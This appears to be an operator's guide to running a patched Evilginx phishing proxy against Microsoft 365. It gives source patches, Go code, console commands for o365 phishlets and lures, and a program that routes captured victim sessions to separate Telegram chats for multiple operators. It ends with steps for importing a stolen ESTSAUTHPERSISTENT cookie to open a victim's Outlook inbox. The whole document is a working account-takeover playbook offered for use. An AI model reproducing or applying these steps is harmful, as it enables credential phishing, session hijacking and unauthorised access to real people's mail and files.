Evilginx AitM
Jan Bakker fork — 3 source patches — confirmed S39/S42
The 3 Source Patches
| File | Change | Why |
|---|---|---|
| main.go | Port 443 to 8443 | Traefik owns 443, evilginx listens on 8443 |
| certdb.go | HTTP-01 to DNS-01 ACME | HTTP-01 needs the ACME server to fetch the challenge from port 80 of the phishlet hostname, which fails behind the proxy; DNS-01 proves control by publishing an _acme-challenge TXT record through the Cloudflare API |
| nameserver.go | AA flag = true | Without it, recursive resolvers such as Google Public DNS treat a reply from the delegated nameserver that lacks the Authoritative Answer bit as lame and return SERVFAIL, so nothing under the domain resolves and the cert never issues. One line. Everything depends on it. |
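The AA patch is one field set on the reply, but it is easy to see why it matters only at the wire level. The following is an added standalone example (not code from evilginx or the Jan Bakker fork) that builds an A-record reply by hand with and without the AA bit and models the resolver's reaction; the hostname, the IP and the `resolverVerdict` model of lame-delegation handling are constructed for illustration.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"net"
	"strings"
)

// DNS header flag bits (RFC 1035, section 4.1.1).
const (
	flagQR = 1 << 15 // message is a response
	flagAA = 1 << 10 // Authoritative Answer: the one bit the nameserver.go patch sets
	flagRD = 1 << 8  // recursion desired, echoed from the query
)

// encodeName turns "login.example.com" into DNS label wire format.
func encodeName(name string) []byte {
	var out []byte
	for _, label := range strings.Split(strings.TrimSuffix(name, "."), ".") {
		out = append(out, byte(len(label)))
		out = append(out, label...)
	}
	return append(out, 0)
}

// buildQuery produces a minimal A query as a recursive resolver would send it.
func buildQuery(id uint16, name string) []byte {
	q := make([]byte, 12)
	binary.BigEndian.PutUint16(q[0:2], id)
	binary.BigEndian.PutUint16(q[2:4], flagRD)
	binary.BigEndian.PutUint16(q[4:6], 1) // QDCOUNT
	q = append(q, encodeName(name)...)
	return append(q, 0, 1, 0, 1) // QTYPE=A, QCLASS=IN
}

// buildReply answers a single-question A query with one A record. The
// authoritative flag is the only difference between a lame and a valid reply.
func buildReply(query []byte, ip net.IP, authoritative bool) ([]byte, error) {
	if len(query) < 12 || binary.BigEndian.Uint16(query[4:6]) != 1 {
		return nil, errors.New("expected a 12-byte header with exactly one question")
	}
	off := 12 // walk the question name to find where the question section ends
	for {
		if off >= len(query) {
			return nil, errors.New("truncated question name")
		}
		l := int(query[off])
		if l == 0 {
			off++
			break
		}
		if l&0xC0 != 0 {
			return nil, errors.New("compressed name in question")
		}
		off += 1 + l
	}
	if off+4 > len(query) {
		return nil, errors.New("truncated question")
	}
	v4 := ip.To4()
	if v4 == nil {
		return nil, errors.New("need an IPv4 address")
	}
	question := query[12 : off+4]

	reply := make([]byte, 12, 12+len(question)+16)
	copy(reply[0:2], query[0:2]) // transaction ID must match the query
	flags := uint16(flagQR) | binary.BigEndian.Uint16(query[2:4])&flagRD
	if authoritative {
		flags |= flagAA
	}
	binary.BigEndian.PutUint16(reply[2:4], flags)
	binary.BigEndian.PutUint16(reply[4:6], 1) // QDCOUNT
	binary.BigEndian.PutUint16(reply[6:8], 1) // ANCOUNT
	reply = append(reply, question...)
	// Answer RR: name pointer to offset 12, TYPE A, CLASS IN, TTL 60, RDLENGTH 4.
	reply = append(reply, 0xC0, 0x0C, 0, 1, 0, 1, 0, 0, 0, 60, 0, 4)
	return append(reply, v4...), nil
}

// isAuthoritative reports whether a reply carries the AA bit.
func isAuthoritative(msg []byte) bool {
	return len(msg) >= 4 && binary.BigEndian.Uint16(msg[2:4])&flagAA != 0
}

// resolverVerdict is a constructed model of a strict recursive resolver: a
// non-AA answer from the server it was delegated to is treated as a lame
// delegation and surfaced to the client as SERVFAIL.
func resolverVerdict(reply []byte) string {
	if isAuthoritative(reply) {
		return "NOERROR"
	}
	return "SERVFAIL"
}

func main() {
	q := buildQuery(0xbeef, "login.example.com") // constructed hostname
	for _, aa := range []bool{false, true} {
		r, err := buildReply(q, net.ParseIP("203.0.113.10"), aa)
		if err != nil {
			panic(err)
		}
		fmt.Printf("AA=%-5v flags=0x%04x resolver says %s\n", aa, binary.BigEndian.Uint16(r[2:4]), resolverVerdict(r))
	}
}
```

Running it prints flags 0x8100 and SERVFAIL for the unpatched behaviour, 0x8500 and NOERROR once AA is set; `dig +norecurse @VPS_IP yourdomain.com A` against a live instance should show `aa` in the flags line for the same reason.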
Key Commands
```
config domain yourdomain.com
config ip VPS_IP
phishlets hostname o365 yourdomain.com
phishlets enable o365
lures create o365
lures get-url 0
sessions
sessions 5
blacklist unban all
```
Per-Lure Routing
One evilginx instance supports any number of lure URLs per phishlet. Each captured session stores the landing_url the victim hit, so the notify script can map the lure path to a destination, for example a different Telegram chat ID per lure: 10 operators, 10 lures, 10 destinations, zero extra infrastructure. This is not in the official documentation; it came from reading data.db directly.
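What "reading data.db directly" looks like, as an added example that is not part of the page or of evilginx: the store is assumed to be a buntdb append-only log (RESP-style `set`/`del`/`flushdb` records) with sessions under `sessions:<id>` keys whose JSON carries a `landing_url` field. Those key and field names, the lure paths, the chat IDs and the whole sample log are constructed for illustration; the replay of `del` records is what keeps a removed session from being routed.

```go
package main

import (
	"bufio"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"net/url"
	"strconv"
	"strings"
)

// session holds the subset of an evilginx session record needed for routing.
// Field names are an assumption about the JSON stored in data.db.
type session struct {
	ID         int    `json:"id"`
	Phishlet   string `json:"phishlet"`
	LandingURL string `json:"landing_url"`
	Username   string `json:"username"`
	RemoteAddr string `json:"remote_addr"`
}

// readCommand parses one RESP array ("*N\r\n$len\r\narg\r\n...") from the log.
func readCommand(r *bufio.Reader) ([]string, error) {
	line, err := r.ReadString('\n')
	if err != nil {
		return nil, err
	}
	line = strings.TrimRight(line, "\r\n")
	if !strings.HasPrefix(line, "*") {
		return nil, fmt.Errorf("bad array header %q", line)
	}
	n, err := strconv.Atoi(line[1:])
	if err != nil {
		return nil, err
	}
	args := make([]string, 0, n)
	for i := 0; i < n; i++ {
		hdr, err := r.ReadString('\n')
		if err != nil {
			return nil, err
		}
		hdr = strings.TrimRight(hdr, "\r\n")
		if !strings.HasPrefix(hdr, "$") {
			return nil, fmt.Errorf("bad bulk header %q", hdr)
		}
		size, err := strconv.Atoi(hdr[1:])
		if err != nil {
			return nil, err
		}
		buf := make([]byte, size+2) // payload plus trailing CRLF
		if _, err := io.ReadFull(r, buf); err != nil {
			return nil, err
		}
		args = append(args, string(buf[:size]))
	}
	return args, nil
}

// loadSessions replays the log so that later set/del records win, then decodes
// every surviving sessions:* value that looks like a JSON object.
func loadSessions(db io.Reader) (map[string]session, error) {
	r := bufio.NewReader(db)
	live := map[string]string{}
	for {
		args, err := readCommand(r)
		if errors.Is(err, io.EOF) {
			break
		}
		if err != nil {
			return nil, err
		}
		if len(args) == 0 {
			continue
		}
		switch strings.ToLower(args[0]) {
		case "set":
			if len(args) >= 3 && strings.HasPrefix(args[1], "sessions:") {
				live[args[1]] = args[2]
			}
		case "del":
			if len(args) >= 2 {
				delete(live, args[1])
			}
		case "flushdb":
			live = map[string]string{}
		}
	}
	out := map[string]session{}
	for k, v := range live {
		if !strings.HasPrefix(v, "{") {
			continue // counters or other non-session values under the prefix
		}
		var s session
		if err := json.Unmarshal([]byte(v), &s); err != nil {
			return nil, fmt.Errorf("%s: %w", k, err)
		}
		out[k] = s
	}
	return out, nil
}

// chatFor maps the lure path of a landing URL to a Telegram chat ID, falling
// back to a default chat for lures nobody has claimed.
func chatFor(landingURL string, routes map[string]int64, fallback int64) int64 {
	u, err := url.Parse(landingURL)
	if err != nil {
		return fallback
	}
	if id, ok := routes[u.Path]; ok {
		return id
	}
	return fallback
}

// respCmd encodes one command in the log format, so sample lengths are never miscounted.
func respCmd(args ...string) string {
	var b strings.Builder
	fmt.Fprintf(&b, "*%d\r\n", len(args))
	for _, a := range args {
		fmt.Fprintf(&b, "$%d\r\n%s\r\n", len(a), a)
	}
	return b.String()
}

// sampleLog is a constructed data.db, not a capture: three sessions, one deleted.
func sampleLog() string {
	return respCmd("set", "sessions:1", `{"id":1,"phishlet":"o365","landing_url":"https://login.example.com/aB3xQ9","username":"alice@example.com","remote_addr":"198.51.100.7"}`) +
		respCmd("set", "sessions:2", `{"id":2,"phishlet":"o365","landing_url":"https://login.example.com/zK7pLm","username":"bob@example.com","remote_addr":"198.51.100.8"}`) +
		respCmd("set", "sessions:3", `{"id":3,"phishlet":"o365","landing_url":"https://login.example.com/q1w2e3","username":"carol@example.com","remote_addr":"198.51.100.9"}`) +
		respCmd("del", "sessions:2")
}

func main() {
	routes := map[string]int64{"/aB3xQ9": -1001, "/zK7pLm": -1002} // constructed lure path -> chat ID
	sessions, err := loadSessions(strings.NewReader(sampleLog()))
	if err != nil {
		panic(err)
	}
	for k, s := range sessions {
		fmt.Printf("%s %s -> chat %d\n", k, s.Username, chatFor(s.LandingURL, routes, -1000))
	}
}
```

The notify script that evilginx calls on a new session would run `loadSessions` against the real file, look up the session it was handed, and post to the chat `chatFor` returns; matching on the exact path keeps a lure with a prefix in common with another from being misrouted.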
The ESTSAUTHPERSISTENT Finding
Microsoft issues ESTSAUTHPERSISTENT at the identity provider (login.microsoftonline.com), not at the application. One capture from ANY M365 login grants browser UI access to every M365 service that signs in through that IdP: Outlook, Teams, SharePoint, OneDrive. The victim logged into the o365 lure; the cookie opens Outlook. They are not the same service. That is the finding. Two caveats: ESTSAUTHPERSISTENT is only set when the victim chose "Stay signed in"; otherwise the session-scoped ESTSAUTH is what gets captured, and it works the same way until it expires. And the cookie belongs to login.microsoftonline.com, so it must be imported for that domain, not for outlook.office.com.
Use the Cookie-Editor browser extension: import the ESTSAUTHPERSISTENT value for login.microsoftonline.com, then visit outlook.office.com. The redirect to the IdP completes silently with the cookie and lands in the full inbox.